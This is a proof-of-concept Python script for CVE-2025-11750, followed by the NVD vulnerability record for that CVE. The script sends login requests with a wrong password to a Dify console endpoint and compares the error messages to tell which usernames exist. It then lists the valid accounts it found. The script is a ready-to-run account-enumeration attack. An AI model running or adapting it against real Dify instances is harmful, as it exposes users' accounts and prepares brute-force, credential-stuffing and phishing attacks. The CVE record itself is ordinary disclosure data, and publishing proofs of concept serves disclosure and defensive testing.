CVE-2025-11750

#!/usr/bin/env python3 # CVE-2025-11750 - Dify Web User Enumeration PoC # This script demonstrates how to enumerate valid user accounts # by analyzing different error messages returned by the authentication endpoint. import requests import sys TARGET_URL = "https://target-dify-instance.com/console/api/login" USERNAME_LIST = ["admin", "test", "user1", "[email protected]"] def check_account_enumeration(target_url, username): """ Send a login request and analyze the response to determine if the account exists based on error message differences. """ payload = { "email": username, "password": "InvalidPassword123!@#" } try: response = requests.post(target_url, json=payload, timeout=10) response_data = response.json() # Analyze response message to determine account existence error_message = str(response_data).lower() if "account not found" in error_message or "user not found" in error_message or "邮箱或密码错误" in error_message: # Non-existent account indicator if "not found" in error_message and "password" not in error_message: return False, "Account does not exist" if "incorrect password" in error_message or "密码错误" in error_message or "invalid password" in error_message: # Existing account with wrong password return True, "Account EXISTS (wrong password response)" # Fallback: check status code and message content if response.status_code == 401 or response.status_code == 403: return None, f"Auth failed: {response_data}" return None, f"Unknown response: {response_data}" except Exception as e: return None, f"Request error: {str(e)}" def main(): print(f"[*] CVE-2025-11750 - Dify Web User Enumeration PoC") print(f"[*] Target: {TARGET_URL}") print(f"[*] Testing {len(USERNAME_LIST)} usernames...\n") valid_accounts = [] for username in USERNAME_LIST: exists, message = check_account_enumeration(TARGET_URL, username) status = "[+] EXISTS" if exists else "[-] NOT FOUND" if exists is False else "[?] UNKNOWN" print(f"{status} | {username} | {message}") if exists: valid_accounts.append(username) print(f"\n[*] Enumeration complete. Found {len(valid_accounts)} valid account(s).") for acc in valid_accounts: print(f" -> {acc}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11750", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:49.037", "lastModified": "2025-10-30T17:46:46.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In langgenius/dify-web version 1.6.0, the authentication mechanism reveals the existence of user accounts by returning different error messages for non-existent and existing accounts. Specifically, when a login or registration attempt is made with a non-existent username or email, the system responds with a message such as \"account not found.\" Conversely, when the username or email exists but the password is incorrect, a different error message is returned. This discrepancy allows an attacker to enumerate valid user accounts by analyzing the error responses, potentially facilitating targeted social engineering, brute force, or credential stuffing attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-544"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langgenius:dify:1.6.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "3CD54A69-580B-4A0E-B3CA-547328898772"}]}]}], "references": [{"url": "https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}